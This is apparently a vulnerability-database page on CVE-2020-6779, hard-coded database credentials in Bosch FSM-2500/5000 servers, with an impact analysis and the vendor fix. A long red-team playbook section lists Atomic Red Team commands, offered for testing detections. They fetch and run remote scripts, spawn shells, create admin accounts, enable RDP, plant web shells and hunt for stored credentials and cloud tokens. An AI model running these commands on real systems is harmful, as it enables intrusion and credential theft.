CVE-2020-6779
Overview
This vulnerability is an authentication bypass caused by the use of hard-coded credentials embedded in the database component of Bosch FSM-2500 and FSM-5000 servers up to version 5.2. The fixed credentials are accessible without authentication, allowing unauthorized access to the database management interface. The flaw resides specifically in the firmware's database authentication mechanism, which fails to enforce unique or configurable credentials, enabling remote attackers to authenticate with administrative privileges.
Vulnerability Description
Use of Hard-coded Credentials in the database of Bosch FSM-2500 server and Bosch FSM-5000 server up to and including version 5.2 allows an unauthenticated remote attacker to log into the database with admin-privileges. This may result in complete compromise of the confidentiality and integrity of the stored data as well as a high availability impact on the database itself. In addition, an attacker may execute arbitrary commands on the underlying operating system.
Impact
An unauthenticated remote attacker can leverage the hard-coded credentials to gain administrative access to the database, resulting in full compromise of data confidentiality and integrity. The attacker can also disrupt database availability and execute arbitrary commands on the host OS, potentially leading to complete system takeover. No user interaction or prior authentication is required, and network access to the affected devices is sufficient. This aligns with the CVSS vector indicating network attack vector, low attack complexity, no privileges or user interaction needed, and high impact on confidentiality, integrity, and availability.
Solution
Bosch has released security advisory BOSCH-SA-332072-BT addressing this issue. Users should upgrade the firmware of Bosch FSM-2500 and FSM-5000 devices to versions later than 5.2, where the hard-coded credentials have been removed or replaced with secure authentication mechanisms. The advisory provides detailed instructions for firmware updates and configuration changes. Applying the vendor-supplied patches promptly is the recommended mitigation to eliminate the embedded credentials and secure database access.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the Bosch FSM-2500 and FSM-5000 servers stems from the use of hard-coded credentials within their database systems. This design flaw allows unauthenticated remote attackers to gain access to the database with administrative privileges. The presence of hard-coded credentials means that these credentials are embedded within the software and cannot be easily changed or removed by users. As a result, any attacker who discovers these credentials can bypass authentication mechanisms, leading to unauthorized access. The implications of this vulnerability are severe, as it compromises the confidentiality, integrity, and availability of the data stored within the database, potentially allowing for extensive data breaches.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could utilize network scanning tools to identify vulnerable instances of the Bosch servers, followed by attempts to connect to the database using the hard-coded credentials. Once access is gained, the attacker can manipulate, delete, or exfiltrate sensitive data. Furthermore, the ability to execute arbitrary commands on the underlying operating system significantly escalates the threat. An attacker could install malware, create backdoors, or pivot to other systems within the network, thereby expanding their control and influence. The ease of exploitation, combined with the potential for extensive damage, makes this vulnerability particularly concerning.
The real-world impact of this vulnerability can be profound, especially for organizations relying on the Bosch FSM-2500 and FSM-5000 servers for critical operations. A successful attack could lead to significant data loss, regulatory penalties, and reputational damage. Businesses may face operational disruptions as they scramble to contain the breach and restore their systems. The financial implications could be substantial, encompassing costs associated with incident response, legal fees, and potential fines from regulatory bodies. Additionally, the loss of customer trust can have long-lasting effects on brand loyalty and market position, making it imperative for organizations to address this vulnerability promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and vulnerability scans can help identify instances of the affected Bosch servers within the network. Organizations should also prioritize patch management, ensuring that they are running the latest versions of the firmware that address this vulnerability. In addition, employing network segmentation can limit the exposure of critical systems to potential attackers. Implementing strict access controls and monitoring for unusual activity can further enhance security. Organizations should also consider conducting employee training on security best practices to reduce the likelihood of successful exploitation.
In conclusion, the vulnerability present in the Bosch FSM-2500 and FSM-5000 servers represents a critical risk that organizations must address. The combination of hard-coded credentials and the potential for remote exploitation poses a significant threat to data security and operational integrity. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to detect and mitigate this vulnerability effectively. Proactive measures, including regular updates and robust security practices, are essential to safeguarding sensitive information and maintaining operational resilience in the face of evolving cyber threats.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Bosch | Fsm-2500 Firmware | All |
cpe:2.3:o:bosch:fsm-2500_firmware:*:*:*:*:*:*:*:*
|
|
|
Bosch | Fsm-5000 Firmware | All |
cpe:2.3:o:bosch:fsm-5000_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-191 | Read Sensitive Constants Within an Executable |
38%
|
— | Low | |
| CAPEC-70 | Try Common or Default Usernames and Passwords |
36%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-6779 |
| psirt.bosch.com |
GitHub CVE
x_refsource_MISC
|
https://psirt.bosch.com/security-advisories/BOSCH-SA-332072-BT.html |